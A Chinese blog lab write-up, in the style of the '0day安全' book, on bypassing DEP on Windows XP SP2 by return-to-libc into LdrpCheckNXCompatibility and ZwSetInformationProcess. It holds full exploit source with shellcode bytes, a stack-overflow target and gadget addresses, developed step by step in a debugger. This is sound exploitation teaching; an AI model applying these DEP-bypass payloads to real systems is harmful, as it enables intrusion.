9.2 Ret2Libc实战之利用ZwSetInformationProcess

最新推荐文章于 2024-05-23 18:42:46 发布
最新推荐文章于 2024-05-23 18:42:46 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: 0day安全 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/127685185
版权

目录

一、Ret2Libc攻击原理

        本节讲通过ZwSetInformationProcess函数关闭DEP,从而绕过DEP!

二、一个重要结构和一个重要函数

1、_KEXECUTE_OPTIONS

2、ZwSetInformationProcess

三、实验思路

四、实验环境

五、实验代码

六、实验步骤

一、Ret2Libc攻击原理

        Ret2libc是Return-to-libc简写,由于DEP不允许我们直接到非可执行页执行指令,我们就需要在其他可执行的位置找到符合我们要求的指令,让这条指令来替我们工作,为了能够控制程序流程,在这条指令执行后,我们还需要一个返回指令,以便收回程序的控制权,然后继续下一步操作。整体流程如下图所示:

         这种方法理论上可行,但是实际操作难度太大。因为,在继承这种思想的前提下,有三种经过改进的、相对比较有效的绕过DEP的exploit的方法:

  • 通过跳转到ZwSetInformationProcess函数将DEP关闭后在转入shellcode执行;
  • 通过跳转到VirtualProtect函数来将shellcode所在内存页设置为可执行状态,然后再转入shellcode执行;
  • 通过跳转到VirtualAlloc函数开辟一段具有执行权限的内存空间,然后将shellcode复制到这段内存中执行。

        本节讲通过ZwSetInformationProcess函数关闭DEP,从而绕过DEP!

二、一个重要结构和一个重要函数

        一个进程的DEP设置标识保存在KPROCESS结构中的_KEXECUTE_OPTIONS上,二这个标识可以通过API函数ZwQueryInformationProcess和ZwSetInformationProcess进行查询和修改。

1、_KEXECUTE_OPTIONS

        _KEXECUTE_OPTIONS中包含以下内容:

Pos0ExecuteDisable :1bit 
Pos1ExecuteEnable :1bit 
Pos2DisableThunkEmulation :1bit 
Pos3Permanent :1bit 
Pos4ExecuteDispatchEnable :1bit 
Pos5ImageDispatchEnable :1bit 
Pos6Spare :2bit

        前四个bit 与DEP相关,当前进程DEP开启时,ExecuteDisable位被置为1;当前进程DEP关闭时ExecuteEnable位被置为1;DisableThunkeEmulation是为了兼容ATL程序设置的;Permanent被置为1,表示这些标志都不能再被修改。

        真正影响DEP状态的是前两位,我们只需将_KEXECUTE_OPTIONS的值设置为0x02(二进制为00000010)就可以将ExecuteEnable设置为1。

2、ZwSetInformationProcess

ZwSetInformationProcess(
IN HANDLE                    ProcessHandle,
IN PROCESS_INFORMATION_CLASS ProcessInformationClass,
IN PVOID                     ProcessInformation,
IN ULONG                     ProcessInformationLength );

        第一个参数为进程的句柄,设置为-1的时候表示为当前进程;第二个参数为信息类;第三个参数可以用来设置_KEXECUTE_OPTIONS;第四个参数为第三个参数的长度。

三、实验思路

        思路一:自己构造一个特殊的栈帧,然后调用ZwSetInformationProcess()函数关闭DEP,其中函数的参数设置如下:

ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE; 
ZwSetInformationProcess( 
 NtCurrentProcess(),         // (HANDLE)-1 
 ProcessExecuteFlags,        // 0x22 
 &ExecuteFlags,              // ptr to 0x2 
 sizeof(ExecuteFlags));      // 0x4

         很明显啊,采用这种方法,关闭DEP很困难。

        思路二:使用系统提供的、调用ZwSetInformationProcess()关闭DEP的函数。因为windows兼容性的问题,当一个进程的Permanent位没有设置时,如果进程需要加载DLL,系统就会对加载的DLL进行DEP兼容性检查,当存在兼容性问题时进程的DEP就会被关闭。为此,有一个特殊的函数——LdrpCheckNXCompatibility函数。

        当符合以下条件之一时,该函数就会调ZwSetInformationProcess()关闭进程的DEP:

        (1)当DLL受SafeDisc版权保护系统保护时;

        (2)当DLL包含.aspcak、.pcle、.sforce等字节时;

        (3)Windows Vista下面当DLL包含在注册表“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurentVersion\Image File Execution Options\DINXOptions”键下边标识出不需要启动DEP模块时。

        这里使用SafeDisc绕过DEP。
        LdrpCheckNXCompatibility关闭DEP的具体流程:

        因为只有CMP AL,1成立的情况下程序才会继续执行,所以我们需要将AL修改为1。将AL修改为1后我们让程序转到0x7C93CD24处执行,在执行到0X7C93CD6F处的RETN 4时,DEP已经关闭,此时如果我们可以让程序在RETN到shellcode的起始地址,就可以执行我们的Sshellcode了。

 

四、实验环境

        操作系统:windows XP SP2

        软件:VC++6.0、原版OD

五、实验代码

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C"//MOV EAX,1 RETN地址
"\x85\x8B\x1D\x5D"//修正EBP
"\x19\x4A\x97\x7C"//增大ESP
"\xB4\xC1\xC5\x7D"//jmp esp
"\x24\xCD\x93\x7C"//关闭DEP代码的起始位置
"\xE9\x33\xFF\xFF"
"\xFF\x90\x90\x90"
;
void test()
{
	char tt[176];
	strcpy(tt,shellcode);
}
int main()
{
	HINSTANCE hInst = LoadLibrary("shell32.dll");
	__asm int 3
	char temp[200];
	test();
    return 0;
}

         代码简要解释:

        (1)本次实验不启用GS和SafeSEH;

        (2)函数test存在一个典型的溢出,通过str复制超长字符串造成str溢出,进而覆盖函数的返回地址;

        (3)将函数的返回地址覆盖为类似MOV AL,1 retn的指令,将AL置为1后立即转入0x7C93CD24处关闭DEP;

        (4)DEP关闭后,shellcode就可以正常执行了。

六、实验步骤

        寻找MOV AL,1 retn;

         为避免执行strcpy时。shellcode被截断,需要选择不包含0X00的地址,本次实验使用0X7C32E252覆盖函数的返回地址。这里不详细介绍怎么找返回地址。

        执行完test函数之后,程序会执行到mov al,1这一跳板的位置,可以看到,程序执行到retn时,EIP将会指向0x12FEA8中保存的地址。因此需要将这四个字节的数据改为0x7C93CD24.

        更改shellcode:

har shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
...
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C"//MOV EAX,1 RETN地址
"\x24\xCD\x93\x7C"//关闭DEP代码的起始位置
;
       
        更改shellcode之后,再次运行:

         程序现在需要对EBP-4位置写入数据,但是EBP在溢出的时候被破坏了(此时的EBP应该是test函数栈帧的EBP,在溢出的时候,被90覆盖了),目前EBP-4的位置并不可以写入,所以程序回出现写入异常,所以我们现在的shellcode布局行不通,在转入0x7C93CD24前需要将EBP指向一个可写的位置。

        使用类似PUSH ESP POP EBP RETN的指令将EBP定位到一个可写的位置,依然使用OllyFindAddr插件,在Disable DEP <=XP SP3搜索结果的Step3部分查看当前内存中所有符合条件的指令:

         选择指令前,先看看寄存器状态:

        所有寄存器只有ESP指向的位置可以写入,所以我们只能选择PUSH ESP POP EBP RETN指令序列。然后,还需要注意的就是,当有入栈操作时,EBP-4处的值可能会被冲刷掉,进而影响ZwSetInformationProcess的参数,造成DEP关闭失败。

        这里先选择0x5D1D8B85处的指令序列来修正EBP。

        更改shellcode为:

har shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
...
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C"//MOV EAX,1 RETN地址
"\x85\x8B\x1D\x5D"//修正EBP
"\x24\xCD\x93\x7C"//关闭DEP代码的起始位置
;

        执行OD,运行到0X5D1D8B87处查看程序运行情况。

         可以看到,程序将执行0x7C93CD24处指令(去关闭DEP),同时ESP会+4+4,指向0x0012FEB4.

         将程序运行到调用ZwSetInformationProcess()处(即0x7C95683B) ,可以在栈帧中看到该函数的四个参数已经入栈。

        回顾要将DEP关闭,ZwSetInformationProcess()函数的参数设置:

ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE; 
ZwSetInformationProcess( 
 NtCurrentProcess(),         // (HANDLE)-1 ,表示当前进程
 ProcessExecuteFlags,        // 0x22 ,设置_KEXECUTE_OPTIONS
 &ExecuteFlags,              // ptr to 0x2 设置_KEXECUTE_OPTIONS的参数地址
 sizeof(ExecuteFlags));      // 0x4 设置_KEXECUTE_OPTIONS的参数长度

         注:根据_KEXECUTE_OPTIONS结构,DEP只和结构中的前四位有关,只要前四位二进制代码位0100就可以关闭DEP,而0x22(00100010)符合条件。

        此时,关闭了DEP,但是程序不受控制了,所以还需进一步处理。为了防止调用函数关闭DEP时,因为入栈操作破坏shellcode的整体布局,需要将ESP转到一个足够大的空间,这样就不担心调用函数的入栈操作了。

        在进入调用函数关闭DEP时,retn 28,可使得ESP增加0x28的空间。

         更改shellcode:

char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
..
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C"//MOV EAX,1 RETN地址
"\x85\x8B\x1D\x5D"//修正EBP
"\x19\x4A\x97\x7C"//增大ESP
"\x90\x90\x90\x90"//jmp esp
"\x24\xCD\x93\x7C"//关闭DEP代码的起始位置
;

         进入关闭DEP的函数之前:

        运行OD到0x7C93CD6F:

        可以发现,0x0012FEB0处的数据没有更改。执行完RETN 4这条指令之后,ESP将指向0x0012FEB8,所以只需在0X0012FEB0放置一条JMP ESP指令就可以让程序执行堆栈内的指令了。

        找一条JMP ESP指令:

        这里选择0x7DC5C1B4处的JMP指令。

        另外,在0x0012FEB8处放置一条长跳指令,让程序跳转到shellcode的起始位置执行shellcode,根据内存状态,可以计算出0x0012FEB8距离shellcode起始位置有200字节,所以跳转指令需要回调205字节(200+5字节跳转指令长度)。分析结束,shellcode布局如下:

        更改shellcode:

char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x92\x7C"//MOV EAX,1 RETN地址
"\x85\x8B\x1D\x5D"//修正EBP
"\x19\x4A\x97\x7C"//增大ESP
"\xB4\xC1\xC5\x7D"//jmp esp
"\x24\xCD\x93\x7C"//关闭DEP代码的起始位置
"\xE9\x33\xFF\xFF"
"\xFF\x90\x90\x90"
;

        编译,最终弹窗:

 

PT_silver
关注
专栏目录
利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
Yx0051的博客
08-09 1230
终于看到著名的DEP机制了,今天可以好好的研究它了! DEP基本原理就是数据所在内存页标识为不可执行,这样就导致一个问题,就是我们之前所有的实验都建立在一个基础上:shellcode的执行是位于堆或者栈上的,我们通过覆盖上面的正常数据,将可执行的恶意数据放在上面进行程序流程劫持。后来,微软的程序员就发现了这个致命的漏洞,就创建了这个机制:从XP SP2开始,CPU一旦检测到在非可执行区域执行指令
shellcode弹出对话框
Linux方程式
11-11 3086
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
Ret2Libc 实战利用 ZwSetInformationProcess
weixin_30237281的博客
03-11 398
参考 《0day安全软件漏洞分析技术第二版》第12章 攻击未开启DEP的程序 思路: 微软要考虑兼容性的问题,所以不能对所有进程强制开启 DEP(64 位下的 AlwaysOn 除外)。 DEP 保护对象是进程级的,当某个进程的加载模块中只要 有一个模块不支持 DEP,这个进程就不能贸然开启 DEP,否则可能会发生异常。 这种攻击手段不与 DEP 有着正面冲突,只是一种普通的溢出攻击。 利用 R...
0day 第12章--12.3.1节:Ret2Libc 实战利用ZwSetInformationProcess
I have a dream
02-21 772
12.3.1 利用Ret2Libc挑战DEP 思想:通过跳转到 ZwSetInformationProcess 函数将DEP关闭后再转入shellcode 执行。 核心:利用LdrpCheckNXCompatibility函数检查SafeDisc来关闭DEP的流程。 核心是0x7C93CD24行代码,检查al是否等于1,如果等于1则执行关闭DEP的流程。 思路:由于DEP开启,堆栈不能直接写入,...
内存保护机制及绕过方法——利用Ret2Libc绕过DEP之ZwSetInformationProcess函数
weixin_30911451的博客
05-11 472
1. DEP内存保护机制 1.1 DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的修补来减少溢出带来的损害,数据执行保护DEP就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时...
Ret2Libc 实战利用 ZwSetInformationProcess.zip
06-11
在网络安全领域,Ret2Libc是一种常见的利用技术,主要用于攻击者通过特定的手段将程序执行流导向libc库中的任意函数,从而实现攻击目的。在这个实战案例中,我们关注的是如何利用ntdll库中的ZwSetInformationProcess...
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8257
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
<Oday安全 12.3.1Ret2Libc实战利用ZwSetInformationProcess>一节补充
lixiangminghate的专栏
03-08 913
本文补充记录我在试验关闭DEP过程遇到的问题和解决方法。     首先要说一下用OllyFindAddr插件寻找目标指令时可能会遇到的问题。诚然这个插件是个好东西,能迅速列出需要的指令流的地址,但并不是所有在列的指令地址都可以使用,挑选前需要甄别。以关闭DEP保护流程中抬高esp值"Find Pop Retn+n"为例: 插件罗列了一堆备选指令地址,我挑选最后一个地址"0x7D97FE
实现ret2libc攻击
weixin_33810302的博客
05-01 371
  在protostar的stack6练习中,提到了ret2libc,所以这里先对这种攻击手段做一个介绍,学习来源https://www.shellblade.net/docs/ret2libc.pdf,仍旧是在protostar的虚拟机上进行的实验。 背景   在stack4的练习中,我们用程序中存在的win函数起始地址覆盖了main函数的返回地址。在实际的攻击中,攻击者往往会把自己的she...
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 2万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
ret2libc 泄露libc后构造system(‘/bin/sh‘)进行攻击(pwn入门)
最新发布
2402_83422357的博客
05-23 1323
上面提到了一个措施,ASLR,它在开启后会对共享libc,堆,和栈的地址进行随机化,所谓的随机化呢,就是偏移。接下来以star函数作为返回地址,以star函数作为返回地址可以使我们第二次栈溢出的时候不需要再按照程序逻辑输入2次yes而且star函数是唯一有栈溢出的函数,所以返回地址的正确选取很重要,之前有一次做题返回地址没选好,给自己增加了很多不必要的麻烦.......这个是最基础的32位的ret2libc,还有64位程序的也差不多,就是传参的方式变了,攻击的payload构造的思路是一样的。
Ret2Libc 攻击技术
guilanl的专栏
03-13 5659
1. DEP 技术对stack overflow 的保护: Data Execution Prevention:  去掉 stack 上的执行权限,可以阻止一部分基于 stack 的攻击。  2. Ret2Libc 攻击原理  Return-to-library technique       简称“Ret2Lib”,这种技术可以绕过DEP的保护,其核心思想是把
Ret2libc
iextract的博客
04-24 661
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
ret2libc攻击原理+实例分析
yajuanpi4899的博客
11-09 4042
ret2libc攻击方式针对动态链接(Dynamic linking) 编译的程序,静态链接一般利用ROP能简单构造出payload进行攻击(详见ROP博客)。一般情况下无法在程序中直接找到system、execve这一类系统函数,动态链接 ...
C++ 反调试(ZwSetInformationThread)
LYSM
09-18 2729
这个 API 的功能是:如果程序正在被调试,则强制将自己从调试器里分离出来。 代码: #include "stdafx.h" #include <iostream> #include <tchar.h> #include <Windows.h> #include <stdio.h> #pragma region 全局变量 /* ZwSet...
0day 挑战DEP,ret2libc利用ZwSetlnformationProcess详细实现
weixin_45612751的博客
11-02 229
0day 挑战DEP,ret2libc利用ZwSetlnformationProcess欢迎使用Markdown编新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编 你好! 这是你第一次使用 Ma
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值